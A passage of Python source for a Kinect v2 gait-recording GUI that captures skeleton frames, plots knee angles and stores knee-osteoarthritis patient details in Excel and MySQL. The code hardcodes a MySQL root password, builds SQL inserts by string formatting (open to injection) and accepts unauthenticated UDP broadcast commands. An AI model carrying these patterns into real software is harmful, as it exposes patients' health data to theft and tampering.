self._infrared_frame_reader = self._infrared_source.OpenReader()
self._infrared_frame_arrived_event = self._infrared_frame_reader.SubscribeFrameArrived()
self._handles[self._waitHandleCount] = self._infrared_frame_arrived_event
self._waitHandleCount += 1
if(self.frame_source_types & FrameSourceTypes_Depth):
self._depth_frame_data = ctypes.POINTER(ctypes.c_ushort)
self._depth_frame_data_capacity = ctypes.c_uint(self.depth_frame_desc.Width * self.depth_frame_desc.Height)
self._depth_frame_data_type = ctypes.c_ushort * self._depth_frame_data_capacity.value
self._depth_frame_data = ctypes.cast(self._depth_frame_data_type(), ctypes.POINTER(ctypes.c_ushort))
self._depth_frame_reader = self._depth_source.OpenReader()
self._depth_frame_arrived_event = self._depth_frame_reader.SubscribeFrameArrived()
self._handles[self._waitHandleCount] = self._depth_frame_arrived_event
self._waitHandleCount += 1
if(self.frame_source_types & FrameSourceTypes_BodyIndex):
self._body_index_frame_data = ctypes.POINTER(ctypes.c_ubyte)
self._body_index_frame_data_capacity = ctypes.c_uint(self.body_index_frame_desc.Width * self.body_index_frame_desc.Height)
self._body_index_frame_data_type = ctypes.c_ubyte * self._body_index_frame_data_capacity.value
self._body_index_frame_data = ctypes.cast(self._body_index_frame_data_type(), ctypes.POINTER(ctypes.c_ubyte))
self._body_index_frame_reader = self._body_index_source.OpenReader()
self._body_index_frame_arrived_event = self._body_index_frame_reader.SubscribeFrameArrived()
self._handles[self._waitHandleCount] = self._body_index_frame_arrived_event
self._waitHandleCount += 1
self._body_frame_data = None
if(self.frame_source_types & FrameSourceTypes_Body):
self._body_frame_data_capacity = ctypes.c_uint(self.max_body_count)
self._body_frame_data_type = ctypes.POINTER(IBody) * self._body_frame_data_capacity.value
self._body_frame_data = ctypes.cast(self._body_frame_data_type(), ctypes.POINTER(ctypes.POINTER(IBody)))
self._body_frame_reader = self._body_source.OpenReader()
self._body_frame_arrived_event = self._body_frame_reader.SubscribeFrameArrived()
self._body_frame_bodies = None
self._handles[self._waitHandleCount] = self._body_frame_arrived_event
self._waitHandleCount += 1
thread.start_new_thread(self.kinect_frame_thread, ())
self._last_color_frame = None
self._last_depth_frame = None
self._last_body_frame = None
self._last_body_index_frame = None
self._last_infrared_frame = None
self._last_long_exposure_infrared_frame = None
self._last_audio_frame = None
start_clock = time.process_time()
self._last_color_frame_access = self._last_color_frame_time = start_clock
self._last_body_frame_access = self._last_body_frame_time = start_clock
self._last_body_index_frame_access = self._last_body_index_frame_time = start_clock
self._last_depth_frame_access = self._last_depth_frame_time = start_clock
self._last_infrared_frame_access = self._last_infrared_frame_time = start_clock
self._last_long_exposure_infrared_frame_access = self._last_long_exposure_infrared_frame_time = start_clock
self._last_audio_frame_access = self._last_audio_frame_time = start_clock
def close(self):
if self._sensor is not None:
ctypes.windll.kernel32.SetEvent(self._close_event)
ctypes.windll.kernel32.CloseHandle(self._close_event)
self._color_frame_reader = None
self._depth_frame_reader = None
self._body_index_frame_reader = None
self._body_frame_reader = None
self._color_source = None
self._depth_source = None
self._body_index_source = None
self._body_source = None
self._body_frame_data = None
self._sensor.Close()
self._sensor = None
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def surface_as_array(self, surface_buffer_interface):
address = ctypes.c_void_p()
size = self.Py_ssize_t()
self._PyObject_AsWriteBuffer(surface_buffer_interface,
ctypes.byref(address), ctypes.byref(size))
bytes = (ctypes.c_byte * size.value).from_address(address.value)
bytes.object = surface_buffer_interface
return bytes
def has_new_color_frame(self):
has = (self._last_color_frame_time > self._last_color_frame_access)
return has
def has_new_depth_frame(self):
has = (self._last_depth_frame_time > self._last_depth_frame_access)
return has
def has_new_body_frame(self):
has = (self._last_body_frame_time > self._last_body_frame_access)
return has
def has_new_body_index_frame(self):
has = (self._last_body_index_frame_time > self._last_body_index_frame_access)
return has
def has_new_infrared_frame(self):
has = (self._last_infrared_frame_time > self._last_infrared_frame_access)
return has
def has_new_long_exposure_infrared_frame(self):
has = (self._last_long_exposure_infrared_frame_time > self._last_long_exposure_infrared_frame_access)
return has
def has_new_audio_frame(self):
has = (self._last_audio_frame_time > self._last_audio_frame_access)
return has
def get_last_color_frame(self):
with self._color_frame_lock:
if self._color_frame_data is not None:
data = numpy.copy(numpy.ctypeslib.as_array(self._color_frame_data, shape=(self._color_frame_data_capacity.value,)))
self._last_color_frame_access = time.process_time()
return data
else:
return None
def get_last_infrared_frame(self):
with self._infrared_frame_lock:
if self._infrared_frame_data is not None:
data = numpy.copy(numpy.ctypeslib.as_array(self._infrared_frame_data, shape=(self._infrared_frame_data_capacity.value,)))
self._last_infrared_frame_access = time.process_time()
return data
else:
return None
def get_last_depth_frame(self):
with self._depth_frame_lock:
if self._depth_frame_data is not None:
data = numpy.copy(numpy.ctypeslib.as_array(self._depth_frame_data, shape=(self._depth_frame_data_capacity.value,)))
self._last_depth_frame_access = time.process_time()
return data
else:
return None
def get_last_body_index_frame(self):
with self._body_index_frame_lock:
if self._body_index_frame_data is not None:
data = numpy.copy(numpy.ctypeslib.as_array(self._body_index_frame_data, shape=(self._body_index_frame_data_capacity.value,)))
self._last_body_index_frame_access = time.process_time()
return data
else:
return None
def get_last_body_frame(self):
with self._body_frame_lock:
if self._body_frame_bodies is not None:
self._last_body_frame_access = time.process_time()
return self._body_frame_bodies.copy()
else:
return None
def body_joint_to_color_space(self, joint):
return self._mapper.MapCameraPointToColorSpace(joint.Position)
def body_joint_to_depth_space(self, joint):
return self._mapper.MapCameraPointToDepthSpace(joint.Position)
def body_joints_to_color_space(self, joints):
joint_points = numpy.ndarray((PyKinectV2.JointType_Count), dtype=numpy.object)
for j in range(0, PyKinectV2.JointType_Count):
joint_points[j] = self.body_joint_to_color_space(joints[j])
return joint_points
def body_joints_to_depth_space(self, joints):
joint_points = numpy.ndarray((PyKinectV2.JointType_Count), dtype=numpy.object)
for j in range(0, PyKinectV2.JointType_Count):
joint_points[j] = self.body_joint_to_depth_space(joints[j])
return joint_points
def kinect_frame_thread(self):
while 1:
wait = ctypes.windll.kernel32.WaitForMultipleObjects(self._waitHandleCount, self._handles, False, PyKinectV2._INFINITE)
if wait == 0:
break
if self._handles[wait] == self._color_frame_arrived_event:
self.handle_color_arrived(wait)
elif self._handles[wait] == self._depth_frame_arrived_event:
self.handle_depth_arrived(wait)
elif self._handles[wait] == self._body_frame_arrived_event:
self.handle_body_arrived(wait)
elif self._handles[wait] == self._body_index_frame_arrived_event:
self.handle_body_index_arrived(wait)
elif self._handles[wait] == self._infrared_frame_arrived_event:
self.handle_infrared_arrived(wait)
elif self._handles[wait] == self._long_exposure_infrared_frame_arrived_event:
self.handle_long_exposure_infrared_arrived(wait)
elif self._handles[wait] == self._audio_frame_arrived_event:
self.handle_audio_arrived(wait)
else:
break
def handle_color_arrived(self, handle_index):
colorFrameEventData = self._color_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
colorFrameRef = colorFrameEventData.FrameReference
try:
colorFrame = colorFrameRef.AcquireFrame()
try:
with self._color_frame_lock:
colorFrame.CopyConvertedFrameDataToArray(self._color_frame_data_capacity, self._color_frame_data, PyKinectV2.ColorImageFormat_Bgra)
self._last_color_frame_time = time.process_time()
except:
pass
colorFrame = None
except:
pass
colorFrameRef = None
colorFrameEventData = None
def handle_depth_arrived(self, handle_index):
depthFrameEventData = self._depth_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
depthFrameRef = depthFrameEventData.FrameReference
try:
depthFrame = depthFrameRef.AcquireFrame()
try:
with self._depth_frame_lock:
depthFrame.CopyFrameDataToArray(self._depth_frame_data_capacity, self._depth_frame_data)
self._last_depth_frame_time = time.process_time()
except:
pass
depthFrame = None
except:
pass
depthFrameRef = None
depthFrameEventData = None
def handle_body_arrived(self, handle_index):
bodyFrameEventData = self._body_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
bofyFrameRef = bodyFrameEventData.FrameReference
try:
bodyFrame = bofyFrameRef.AcquireFrame()
try:
with self._body_frame_lock:
bodyFrame.GetAndRefreshBodyData(self._body_frame_data_capacity, self._body_frame_data)
self._body_frame_bodies = KinectBodyFrameData(bodyFrame, self._body_frame_data, self.max_body_count)
self._last_body_frame_time = time.process_time()
# need these 2 lines as a workaround for handling IBody referencing exception
self._body_frame_data = None
self._body_frame_data = ctypes.cast(self._body_frame_data_type(), ctypes.POINTER(ctypes.POINTER(IBody)))
except:
pass
bodyFrame = None
except:
pass
bofyFrameRef = None
bodyFrameEventData = None
def handle_body_index_arrived(self, handle_index):
bodyIndexFrameEventData = self._body_index_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
bodyIndexFrameRef = bodyIndexFrameEventData.FrameReference
try:
bodyIndexFrame = bodyIndexFrameRef.AcquireFrame()
try:
with self._body_index_frame_lock:
bodyIndexFrame.CopyFrameDataToArray(self._body_index_frame_data_capacity, self._body_index_frame_data)
self._last_body_index_frame_time = time.process_time()
except:
pass
bodyIndexFrame = None
except:
pass
bodyIndexFrame = None
bodyIndexFrameEventData = None
def handle_infrared_arrived(self, handle_index):
infraredFrameEventData = self._infrared_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
infraredFrameRef = infraredFrameEventData.FrameReference
try:
infraredFrame = infraredFrameRef.AcquireFrame()
try:
with self._infrared_frame_lock:
infraredFrame.CopyFrameDataToArray(self._infrared_frame_data_capacity, self._infrared_frame_data)
self._last_infrared_frame_time = time.process_time()
except:
pass
infraredFrame = None
except:
pass
infraredFrameRef = None
infraredFrameEventData = None
def handle_long_exposure_infrared_arrived(self, handle_index):
pass
def handle_audio_arrived(self, handle_index):
pass
class KinectBody(object):
def __init__(self, body = None):
self.is_restricted = False
self.tracking_id = -1
self.is_tracked = False
if body is not None:
self.is_tracked = body.IsTracked
if self.is_tracked:
self.is_restricted = body.IsRestricted
self.tracking_id = body.TrackingId
self.engaged = body.Engaged
self.lean = body.Lean
self.lean_tracking_state = body.LeanTrackingState
self.hand_left_state = body.HandLeftState
self.hand_left_confidence = body.HandLeftConfidence
self.hand_right_state = body.HandRightState
self.hand_right_confidence = body.HandRightConfidence
self.clipped_edges = body.ClippedEdges
joints = ctypes.POINTER(PyKinectV2._Joint)
joints_capacity = ctypes.c_uint(PyKinectV2.JointType_Count)
joints_data_type = PyKinectV2._Joint * joints_capacity.value
joints = ctypes.cast(joints_data_type(), ctypes.POINTER(PyKinectV2._Joint))
body.GetJoints(PyKinectV2.JointType_Count, joints)
self.joints = joints
joint_orientations = ctypes.POINTER(PyKinectV2._JointOrientation)
joint_orientations_data_type = PyKinectV2._JointOrientation * joints_capacity.value
joint_orientations = ctypes.cast(joint_orientations_data_type(), ctypes.POINTER(PyKinectV2._JointOrientation))
body.GetJointOrientations(PyKinectV2.JointType_Count, joint_orientations)
self.joint_orientations = joint_orientations
class KinectBodyFrameData(object):
def __init__(self, bodyFrame, body_frame_data, max_body_count):
self.bodies = None
self.floor_clip_plane = None
if bodyFrame is not None:
self.floor_clip_plane = bodyFrame.FloorClipPlane
self.relative_time = bodyFrame.RelativeTime
self.bodies = numpy.ndarray((max_body_count), dtype=numpy.object)
for i in range(0, max_body_count):
self.bodies[i] = KinectBody(body_frame_data[i])
def copy(self):
res = KinectBodyFrameData(None, None, 0)
res.floor_clip_plane = self.floor_clip_plane
res.relative_time = self.relative_time
res.bodies = numpy.copy(self.bodies)
return res
# colors for drawing different bodies
SKELETON_COLORS = [pygame.color.THECOLORS["red"],
pygame.color.THECOLORS["blue"],
pygame.color.THECOLORS["green"],
pygame.color.THECOLORS["orange"],
pygame.color.THECOLORS["purple"],
pygame.color.THECOLORS["yellow"],
pygame.color.THECOLORS["violet"]]
class TimesUpDialog(gui.Dialog):
def __init__(self,**params):
title = gui.Label("massagebox")
width = 400
height = 50
doc = gui.Document(width=width)
space = title.style.font.size(" ")
doc.block(align=0)
for word in """TimeIsUp_RecordingFinished""".split(" "):
doc.add(gui.Label(word))
doc.space(space)
doc.br(space[1])
gui.Dialog.__init__(self,title,gui.ScrollArea(doc,width,height))
class MassageBox(gui.Dialog):
msg = ''
def __init__(self,**params):
title = gui.Label("massagebox")
width = 400
height = 50
table = gui.Table(width=width)
massage = gui.Label(self.msg)
table.add(massage)
gui.Dialog.__init__(self,title,gui.ScrollArea(table,width,height))
class DrawGraphDialog(gui.Dialog):
def __init__(self,**params):
title = gui.Label("Draw Graph")
self.t= gui.Table(width=600, height=300)
td_style = {'padding_right': 10}
self.t.tr()
self.t.td( gui.Label('File Name:') , style=td_style, row=0 )
self.input_file = gui.Input(size=40)
self.t.td( self.input_file, style=td_style, colspan=1, )
b = gui.Button("Browse...")
self.t.td( b, style=td_style, colspan=1 )
b.connect(gui.CLICK, self.open_file_browser, None)
self.t.tr()
b = gui.Button("Draw Left Graph")
self.t.td( b, style=td_style, colspan=2)
b.connect(gui.CLICK, self.left_data_process)
b = gui.Button("Draw Right Graph")
self.t.td( b, style=td_style, colspan=2)
b.connect(gui.CLICK, self.right_data_process)
gui.Dialog.__init__(self,title,self.t)
def open_file_browser(self, arg):
d = gui.FileDialog()
d.connect(gui.CHANGE, self.handle_file_browser_closed, d)
d.open()
def handle_file_browser_closed(self, dlg):
if dlg.value: self.input_file.value = dlg.value.split('\\')[-1]
def meanfilter(self, flux, w):
length = len(flux)
flux_out = np.zeros((length, 1))
for i in range(length):
if i >= w and i < length - w:
flux_out[i] = np.mean(flux[i-w:i+w])
else:
flux_out[i] = flux[i]
return flux_out
def right_data_process(self):
filename = self.input_file.value
print(filename)
data = np.loadtxt(filename)
roworg, colorg = data.shape
lastTF = 10
firstTF = 10
roworg = roworg - lastTF - firstTF
dataorg = np.zeros((roworg,colorg))
for i in range(roworg):
for j in range(colorg):
dataorg[i][j] = data[i+firstTF,j]
print('test')
for i in range(75):
colmean = self.meanfilter(dataorg[:, i], 2)
for row in range(roworg):
dataorg[row, i] = colmean[row][0]
pointNumi = 17;#KneeRight
pointNumj = 16;#HipRight
pointNumk = 18;#AnkleRight
# KneeLeftX = zeros(1,roworg);
# KneeLeftY = zeros(1,roworg);
TimeF = np.zeros((1,roworg));
# for rownow in range(roworg):
# KneeLeftX(1,rownow) = dataorg[rownow,3*(pointNumj + 1)-2];
# KneeLeftY(1,rownow) = dataorg[rownow,3*(pointNumj + 1)-1];
# TimeF(1,rownow) = rownow;
FeatureOutknee = np.zeros((roworg,2));
for rownow in range(roworg):
FeatureOutknee[rownow,0] = (dataorg[rownow,3*pointNumi]-dataorg[rownow,3*pointNumj])/(dataorg[rownow,3*pointNumi +1] - dataorg[rownow,3*pointNumj+1]);#kneeleft hipleft angle
FeatureOutknee[rownow,1] = (dataorg[rownow,3*pointNumi]-dataorg[rownow,3*pointNumk])/(dataorg[rownow,3*pointNumi +1] - dataorg[rownow,3*pointNumk+1]);#kneeleft hipleft angle
TimeF[0,rownow] = rownow;
for i in range(2):
colmean = self.meanfilter(FeatureOutknee[:, i], 2)
for row in range(roworg):
FeatureOutknee[row, i] = colmean[row][0]
plt.plot(TimeF[0, :], FeatureOutknee[:,0],'-r', TimeF[0, :], FeatureOutknee[:,1],'-g')
plt.xlabel('Time')
plt.ylabel('Tangent of the Angle')
plt.title("The curve of the tangent of an Right Side Angle over time")
plt.legend(["Hip-knee", "Knees-ankles"], loc='upper right')
picture_name = filename.split('.')[0] + ".png"
plt.savefig(picture_name)
np.savetxt(filename.split('.')[0] + "_processed.txt", FeatureOutknee ,fmt='%f',delimiter=' ')
plt.show()
return picture_name
def left_data_process(self):
filename = self.input_file.value
print(filename)
data = np.loadtxt(filename)
roworg, colorg = data.shape
lastTF = 10
firstTF = 10
roworg = roworg - lastTF - firstTF
dataorg = np.zeros((roworg,colorg))
for i in range(roworg):
for j in range(colorg):
dataorg[i][j] = data[i+firstTF,j]
print('test')
for i in range(75):
colmean = self.meanfilter(dataorg[:, i], 2)
for row in range(roworg):
dataorg[row, i] = colmean[row][0]
pointNumi = 13;#KneeLeft
pointNumj = 12;#HipLeft
pointNumk = 14;#AnkleLeft
# KneeLeftX = zeros(1,roworg);
# KneeLeftY = zeros(1,roworg);
TimeF = np.zeros((1,roworg));
# for rownow in range(roworg):
# KneeLeftX(1,rownow) = dataorg[rownow,3*(pointNumj + 1)-2];
# KneeLeftY(1,rownow) = dataorg[rownow,3*(pointNumj + 1)-1];
# TimeF(1,rownow) = rownow;
FeatureOutknee = np.zeros((roworg,2));
for rownow in range(roworg):
FeatureOutknee[rownow,0] = (dataorg[rownow,3*pointNumi]-dataorg[rownow,3*pointNumj])/(dataorg[rownow,3*pointNumi +1] - dataorg[rownow,3*pointNumj+1]);#kneeleft hipleft angle
FeatureOutknee[rownow,1] = (dataorg[rownow,3*pointNumi]-dataorg[rownow,3*pointNumk])/(dataorg[rownow,3*pointNumi +1] - dataorg[rownow,3*pointNumk+1]);#kneeleft hipleft angle
TimeF[0,rownow] = rownow;
for i in range(2):
colmean = self.meanfilter(FeatureOutknee[:, i], 2)
for row in range(roworg):
FeatureOutknee[row, i] = colmean[row][0]
plt.plot(TimeF[0, :], FeatureOutknee[:,0],'-r', TimeF[0, :], FeatureOutknee[:,1],'-g')
plt.xlabel('Time')
plt.ylabel('Tangent of the Angle')
plt.title("The curve of the tangent of an Left Side Angle over time")
plt.legend(["Hip-knee", "Knees-ankles"], loc='upper right')
picture_name = filename.split('.')[0] + ".png"
plt.savefig(picture_name)
np.savetxt(filename.split('.')[0] + "_processed.txt", FeatureOutknee ,fmt='%f',delimiter=' ')
plt.show()
return picture_name
class PersonalDataDialog(gui.Dialog):
def __init__(self,**params):
title = gui.Label("Commit personal data to database")
self.t= gui.Table(width=600, height=300)
td_style = {'padding_right': 10}
self.t.tr()
self.t.td( gui.Label('Original Data File Name:') , style=td_style)
self.original_input_file = gui.Input(size=40)
self.t.td( self.original_input_file, style=td_style, colspan=1, )
b = gui.Button("Browse...")
self.t.td( b, style=td_style, colspan=1 )
b.connect(gui.CLICK, self.open_original_file_browser, None)
self.t.tr()
self.t.td( gui.Label('Processed Data File Name:') , style=td_style)
self.processed_input_file = gui.Input(size=40)
self.t.td( self.processed_input_file, style=td_style, colspan=1, )
b = gui.Button("Browse...")
self.t.td( b, style=td_style, colspan=1 )
b.connect(gui.CLICK, self.open_processed_file_browser, None)
self.t.tr()
self.t.td( gui.Label('Person Name:') , style=td_style)
self.name = gui.TextArea('')
self.t.td(self.name)
self.t.tr()
b = gui.Button("Connect database")
self.t.td( b, style=td_style, colspan=2)
b.connect(gui.CLICK, self.connect_database)
b = gui.Button("Commit data")
self.t.td( b, style=td_style, colspan=2)
b.connect(gui.CLICK, self.commit_data)
self.db = None
gui.Dialog.__init__(self,title,self.t)
def open_original_file_browser(self, arg):
d = gui.FileDialog()
d.connect(gui.CHANGE, self.handle_original_file_browser_closed, d)
d.open()
def handle_original_file_browser_closed(self, dlg):
if dlg.value:
self.original_input_file.value = dlg.value.split('\\')[-1]
def open_processed_file_browser(self, arg):
d = gui.FileDialog()
d.connect(gui.CHANGE, self.handle_processed_file_browser_closed, d)
d.open()
def handle_processed_file_browser_closed(self, dlg):
if dlg.value:
self.processed_input_file.value = dlg.value.split('\\')[-1]
def connect_database(self):
try:
self.db = pymysql.connect("localhost","root","hh19950208","gait" )
MassageBox.msg = "Database connection successful"
MassageBox().open()
except:
MassageBox.msg = "Database connection failed"
MassageBox().open()
def commit_data(self):
try:
cursor = self.db.cursor()
with open(self.original_input_file.value, 'r', encoding='utf-8')as f:
gait_original_data = f.read()
with open(self.processed_input_file.value, 'r', encoding='utf-8')as f:
processed_data = f.read()
name = self.name.value
sql = "insert into personaldata (name, original_data, processed_data) values ('%s', '%s','%s')" % \
(name, gait_original_data, processed_data)
try:
cursor.execute(sql)
self.db.commit()
MassageBox.msg = "commit personal infomation successfully"
MassageBox().open()
except Exception as err:
# print(err)
# self.db.rollback()
MassageBox.msg = "commit personal infomation unsuccessfully"
MassageBox().open()
except Exception as err:
# print(err)
MassageBox.msg = "please connect to the database or select file first"
MassageBox().open()
class SkeletonControl(gui.Table):
run_capture = False
mydatetime = "0-0-0-0-0-0-0"
status = "When there is a skeleton picture, click 'start' to record"
textarea = gui.TextArea(value=status, width=500, height=20)
name = gui.Input(value='',size=16)
kl_result = gui.Select(value='0')
save_pic = False
sex = gui.Select(value='Male')
age = gui.Input(value='',size=16)
height = gui.Input(value='',size=16)
weight = gui.Input(value='',size=16)
db = None
def __init__(self,**params):
gui.Table.__init__(self,**params)
fg = (0,0,0)
# self.timesup_dialog = TimesUpDialog()
self.draw_graph_dialog = DrawGraphDialog()
self.personal_data_dialog = PersonalDataDialog()
self.tr()
self.td(gui.Label("Skeleton GUI",color=fg),colspan=2)
self.tr()
self.td(gui.Label("Name: ",color=fg),align=1)
self.td(self.name,colspan=1)
self.tr()
self.td(gui.Label("KL_Result: ",color=fg),align=1)
self.td(self.kl_result)
self.kl_result.add("0",'0')
self.kl_result.add("1",'1')
self.kl_result.add("2",'2')
self.kl_result.add("3",'3')
self.kl_result.add("4",'4')
self.tr()
self.td(gui.Label("Sex: ",color=fg),align=1)
self.td(self.sex)
self.sex.add("Male",'Male')
self.sex.add("Female",'Female')
self.tr()
self.td(gui.Label("Age: ",color=fg),align=1)
self.td(self.age,colspan=1)
self.tr()
self.td(gui.Label("Height(m): ",color=fg),align=1)
self.td(self.height,colspan=1)
self.tr()
self.td(gui.Label("Weight(kg): ",color=fg),align=1)
self.td(self.weight,colspan=1)
save_info_btn = gui.Button("Save Info")
save_info_btn.connect(gui.CLICK, self.click_save_info_btn)
self.tr()
self.td(save_info_btn, colspan=1)
start_btn = gui.Button("Start")
start_btn.connect(gui.CLICK, self.click_start_btn)
self.td(start_btn,colspan=1)
stop_btn = gui.Button("Stop")
stop_btn.connect(gui.CLICK, self.click_stop_btn)
self.td(stop_btn,colspan=1)
save_pic_btn = gui.Button("Save Pic")
save_pic_btn.connect(gui.CLICK, self.click_save_pic_btn)
self.tr()
self.td(save_pic_btn,colspan=1)
draw_graph_btn = gui.Button("Draw Graph")
draw_graph_btn.connect(gui.CLICK, self.draw_graph_dialog.open)
self.td(draw_graph_btn, colspan=1)
self.tr()
connect_db_btn = gui.Button('Connect database')
connect_db_btn.connect(gui.CLICK, self.click_connect_db_btn)
self.td(connect_db_btn, colspan=1)
commit_info_btn = gui.Button('commit info')
commit_info_btn.connect(gui.CLICK, self.click_commit_info_btn)
self.td(commit_info_btn, colspan=1)
commit_data_btn = gui.Button('commit data')
commit_data_btn.connect(gui.CLICK, self.click_commit_data_btn)
self.td(commit_data_btn, colspan=1)
self.tr()
self.td(gui.Label("MassageBox: ",color=fg),align=1)
self.td(SkeletonControl.textarea, colspan=4)
def lan_broadcast_msg(self, msg):
msg = msg.encode()
host = "<broadcast>" # broadcast
port = 6666
addr = (host, port)
UDPSock = socket(AF_INET, SOCK_DGRAM)
UDPSock.bind(("", 0))
UDPSock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
UDPSock.sendto(msg, addr)
UDPSock.close()
def click_save_info_btn(self):
try:
wb = load_workbook("patients_info.xlsx")
sheet = wb.active
nrows = sheet.max_row
if self.name.value == sheet.cell(nrows, 1).value and self.kl_result.value == sheet.cell(nrows, 2).value and self.sex.value == sheet.cell(nrows, 3).value \
and self.age.value == sheet.cell(nrows, 4).value and self.height.value == sheet.cell(nrows, 5).value and self.weight.value == sheet.cell(nrows, 6).value:
MassageBox.msg = '"' + self.name.value + '"' + " infomation already saved"
MassageBox().open()
elif self.name.value == "" and self.kl_result.value == "" and self.sex.value == "" \
and self.age.value == "" and self.height.value == "" and self.weight.value == "":
MassageBox.msg = "please enter infomation first"
MassageBox().open()
else:
sheet.cell(nrows+1, 1).value = self.name.value
sheet.cell(nrows+1, 2).value = self.kl_result.value
sheet.cell(nrows+1, 3).value = self.sex.value
sheet.cell(nrows+1, 4).value = self.age.value
sheet.cell(nrows+1, 5).value = self.height.value
sheet.cell(nrows+1, 6).value = self.weight.value
try:
wb.save(filename="patients_info.xlsx")
MassageBox.msg = '"' + self.name.value + '"' + " infomation saved"
MassageBox().open()
except:
MassageBox.msg = 'please close "patients_info.xlsx" first'
MassageBox().open()
except:
wb = Workbook()
wb = Workbook()
sheet = wb.active
sheet['A1'] = "姓名"
sheet['B1'] = "膝关节炎KL分级诊断结果"
sheet['C1'] = "性别"
sheet['D1'] = "年龄"
sheet['E1'] = "身高"
sheet['F1'] = "体重"
nrows = sheet.max_row
if self.name.value == "" and self.kl_result.value == "" and self.sex.value == "" \
and self.age.value == "" and self.height.value == "" and self.weight.value == "":
MassageBox.msg = "please enter infomation first"
MassageBox().open()
else:
sheet.cell(nrows+1, 1).value = self.name.value
sheet.cell(nrows+1, 2).value = self.kl_result.value
sheet.cell(nrows+1, 3).value = self.sex.value
sheet.cell(nrows+1, 4).value = self.age.value
sheet.cell(nrows+1, 5).value = self.height.value
sheet.cell(nrows+1, 6).value = self.weight.value
try:
wb.save(filename="patients_info.xlsx")
MassageBox.msg = '"' + self.name.value + '"' + " infomation saved"
MassageBox().open()
except:
MassageBox.msg = 'please close "patients_info.xlsx" first'
MassageBox().open()
def click_start_btn(self):
if SkeletonControl.run_capture:
self.textarea.value = "Recording Already Running"
MassageBox.msg = "Recording Already Running"
MassageBox().open()
return
else:
msg = "startrecording" + "-" + self.name.value + '-' + self.kl_result.value + '-' + self.sex.value + "-" + \
self.age.value + "-" + self.height.value + "-" + self.weight.value
for i in range(10):
self.lan_broadcast_msg(msg)
self.s = Myscheduler(time.time, time.sleep)
self.s.enter(10,1,self.times_up, ())
t=threading.Thread(target=self.s.run)
t.start()
def click_stop_btn(self):
if SkeletonControl.run_capture:
SkeletonControl.run_capture = False
self.s.stop()
self.textarea.value = "recording stopped"
MassageBox.msg = "recording stopped"
MassageBox().open()
else:
self.textarea.value = "start recording first"
MassageBox.msg = "start recording first"
MassageBox().open()
# self.timesup_dialog.open()
def click_save_pic_btn(self):
SkeletonControl.save_pic = True
def click_connect_db_btn(self):
try:
self.db = pymysql.connect("localhost","root","hh19950208","gait" )
MassageBox.msg = "Database connection successful"
MassageBox().open()
except:
MassageBox.msg = "Database connection failed"
MassageBox().open()
def click_commit_info_btn(self):
try:
cursor = self.db.cursor()
name = self.name.value
kl_result = self.kl_result.value
sex = self.sex.value
age = self.age.value
height = self.height.value
weight = self.weight.value
if kl_result == "":
kl_result = -1
kl_result = int(kl_result)
if age == '':
age = -1
age = int(age)
if height == "":
height = -1
height = float(height)
if weight == '':
weight = -1
weight = float(weight)
sql = "insert into personalinfo (name, kl_result, sex, age, height, weight) values ('%s', '%d','%s', '%d', '%f', '%f')" % \
(name, kl_result, sex, age, height, weight)
try:
cursor.execute(sql)
self.db.commit()
MassageBox.msg = "commit personal infomation successfully"
MassageBox().open()
except Exception as err:
# print(err)
# self.db.rollback()
MassageBox.msg = "commit personal infomation unsuccessfully"
MassageBox().open()
cursor.close()
except Exception as err:
# print(err)
MassageBox.msg = "please connect to the database first"
MassageBox().open()
def click_commit_data_btn(self):
self.personal_data_dialog.open()
def get_datetime_string(self):
string = str(datetime.now())
mydate, mytime = string.split(" ")
hour, minute, second = mytime.split(":")
second = float(second)
millisecond = str(int((second - int(second)) * 1000))
second = str(int(second))
return mydate + "-" + hour + '-' + minute + '-' + second + '-' + millisecond
def times_up(self):
# self.run_capture = False
msg = 'timesup'
for i in range(10):
self.lan_broadcast_msg(msg)
self.textarea.value = "times up, recording stopped"
MassageBox.msg = 'TimeIsUp_RecordingFinished'
timesup_dialog = MassageBox()
timesup_dialog.open()
class Myscheduler(sched.scheduler):
def __init__(self, timefunc=_time, delayfunc=time.sleep):
sched.scheduler.__init__(self, timefunc=_time, delayfunc=time.sleep)
self._running = True
def stop(self):
self._running = False
def run(self, blocking=True):
"""Execute events until the queue is empty.
If blocking is False executes the scheduled events due to
expire soonest (if any) and then return the deadline of the
next scheduled call in the scheduler.
When there is a positive delay until the first event, the
delay function is called and the event is left in the queue;
otherwise, the event is removed from the queue and executed
(its action function is called, passing it the argument). If
the delay function returns prematurely, it is simply
restarted.
It is legal for both the delay function and the action
function to modify the queue or to raise an exception;
exceptions are not caught but the scheduler's state remains
well-defined so run() may be called again.
A questionable hack is added to allow other threads to run:
just after an event is executed, a delay of 0 is executed, to
avoid monopolizing the CPU when other threads are also
runnable.
"""
# localize variable access to minimize overhead
# and to improve thread safety
lock = self._lock
q = self._queue
delayfunc = self.delayfunc
timefunc = self.timefunc
pop = heapq.heappop
while self._running:
with lock:
if not q:
break
time, priority, action, argument, kwargs = q[0]
now = timefunc()
if time > now:
delay = True
else:
delay = False
pop(q)
if delay:
if not blocking:
return time - now
delayfunc(time - now)
else:
action(*argument, **kwargs)
delayfunc(0) # Let other threads run
class SocketReceiver:
def get_socket_data(self):
host = ""
port = 6666
buf = 1024
addr = (host, port)
UDPSock = socket(AF_INET, SOCK_DGRAM)
UDPSock.bind(addr)
while True:
(data, addr) = UDPSock.recvfrom(buf)
data = data.decode()
data = data.split('-')
print(data)
if data[0] == "startrecording":
SkeletonControl.run_capture = True
SkeletonControl.mydatetime = self.get_datetime_string()
SkeletonControl.name.value = data[1]
SkeletonControl.kl_result.value = data[2]
SkeletonControl.sex.value = data[3]
SkeletonControl.age.value = data[4]
SkeletonControl.height.value = data[5]
SkeletonControl.weight.value = data[6]
if data[0] == "timesup":
SkeletonControl.run_capture = False
SkeletonControl.textarea.value = "times up, recording stopped"
def get_datetime_string(self):
string = str(datetime.now())
mydate, mytime = string.split(" ")
hour, minute, second = mytime.split(":")
second = float(second)
millisecond = str(int((second - int(second)) * 1000))
second = str(int(second))
return mydate + "-" + hour + '-' + minute + '-' + second + '-' + millisecond
def run(self):
self.get_socket_data()
class BodyGameRuntime(object):
def __init__(self):
pygame.init()
# Used to manage how fast the screen updates
